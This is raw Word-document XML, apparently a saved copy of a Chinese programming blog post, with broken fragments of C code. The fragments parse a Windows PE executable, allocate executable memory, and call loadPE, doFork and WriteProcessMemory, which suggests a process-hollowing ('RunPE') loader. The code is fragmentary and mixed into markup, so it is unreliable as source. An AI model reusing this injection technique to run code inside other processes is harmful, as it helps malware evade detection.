name="Picture 62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9525" b="0"/>
            <wp:docPr id="621" name="_18759_18845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8759_18845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22" name="Picture 62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printf("WriteProcessMemory failed ");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23" name="Picture 62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TerminateProcess(pi.hProcess, 0);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24" name="Picture 624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25" name="Picture 625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26" name="Picture 62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27" name="_18860_18969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8860_18969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28" name="Picture 62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printf("Load failed.  Consider making this EXE relocatable. ");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29" name="Picture 62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TerminateProcess(pi.hProcess, 0);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30" name="Picture 630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31" name="Picture 631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32" name="Picture 63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33" name="_18981_19026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8981_19026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34" name="Picture 63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printf("Cannot load %s ", TARGETPROC);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35" name="Picture 635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36" name="Picture 636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37" name="Picture 63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38" name="Picture 63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39" name="Picture 63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40" name="Picture 64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41" name="Picture 64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main(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argc,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char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* argv[])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642" name="_19067_19971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9067_19971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43" name="Picture 64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POINT        pt;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44" name="Picture 64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GetCursorPos(&amp;pt);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45" name="Picture 64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46" name="Picture 64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FILE *fp;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47" name="Picture 64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(argc != 2)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48" name="_19129_19256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9129_19256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49" name="Picture 64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 Usage: %s &lt;EXE filename&gt; ", argv[0]);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50" name="Picture 65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printf("No Input EXE, use: %s ", szDeft);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51" name="Picture 65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fp = fopen(szDeft, "rb");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52" name="Picture 652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53" name="Picture 65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54" name="Picture 65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fp = fopen(argv[1], "rb");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55" name="Picture 65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(fp)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56" name="_19308_19908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9308_1990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57" name="Picture 65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MZHeader mzH;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58" name="Picture 65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PE_Header peH;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59" name="Picture 65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PE_ExtHeader peXH;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60" name="Picture 66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SectionHeader *secHdr;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61" name="Picture 66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62" name="Picture 66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(readPEInfo(fp, &amp;mzH, &amp;peH, &amp;peXH, &amp;secHdr))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63" name="_19441_19890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9441_19890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64" name="Picture 66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imageSize = calcTotalImageSize(&amp;mzH, &amp;peH, &amp;peXH, secHdr);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0" b="0"/>
            <wp:docPr id="665" name="Picture 66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//printf("Image Size = %X ", imageSize);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66" name="Picture 66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67" name="Picture 66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LPVOID ptrLoc = VirtualAlloc(NULL, imageSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);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68" name="Picture 66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(ptrLoc)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69" name="_19658_19843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9658_19843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{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70" name="Picture 67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t>//printf("Memory allocated at %X ", ptrLoc);</w:t>
      </w:r>
      <w:r w:rsidRPr="00277B89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71" name="Picture 67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loadPE(fp, &amp;mzH, &amp;peH, &amp;peXH, secHdr, ptrLoc);                                            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72" name="Picture 67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73" name="Picture 67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doFork(&amp;mzH, &amp;peH, &amp;peXH, secHdr, ptrLoc, imageSize);                                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74" name="Picture 674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75" name="Picture 67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76" name="Picture 67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printf("Allocation failed ");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77" name="Picture 677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78" name="Picture 67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79" name="Picture 67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fclose(fp);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80" name="Picture 680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81" name="Picture 68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82" name="Picture 68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printf(" Cannot open the EXE file! ");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83" name="Picture 68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84" name="Picture 68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77B8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 0;</w:t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85" name="Picture 685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B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77B89" w:rsidRPr="00277B89" w:rsidRDefault="00277B89" w:rsidP="0027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B89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277B89" w:rsidRDefault="00277B89"/>
    <w:sectPr w:rsidR="00277B89" w:rsidSect="0016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77B89"/>
    <w:rsid w:val="00167374"/>
    <w:rsid w:val="00277B89"/>
    <w:rsid w:val="00CB1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74"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00277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B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co">
    <w:name w:val="ico"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00277B89"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="linktitle">
    <w:name w:val="link_title"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00277B89"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00277B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7B89"/>
    <w:rPr>
      <w:color w:val="800080"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="linkcategories">
    <w:name w:val="link_categories"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00277B89"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="linkpostdate">
    <w:name w:val="link_postdate"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00277B89"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="linkview">
    <w:name w:val="link_view"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00277B89"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="linkcomments">
    <w:name w:val="link_comments"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00277B89"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="linkcollect">
    <w:name w:val="link_collect"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00277B89"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="linkreport">
    <w:name w:val="link_report"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00277B89"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BalloonText">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BalloonTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00277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617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5" w:color="auto"/>
                <w:bottom w:val="single" w:sz="4" w:space="3" w:color="auto"/>
                <w:right w:val="single" w:sz="4" w:space="5" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="5707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hyperlink" Target="http://blog.csdn.net/zzz3265/article/details/1824662" TargetMode="Externa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3485</Words>
  <Characters>19867</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>165</Lines>
  <Paragraphs>46</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>23306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2016-11-21T08:16:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-11-21T08:44:00Z</dcterms:modified>
</cp:coreProperties>
</file>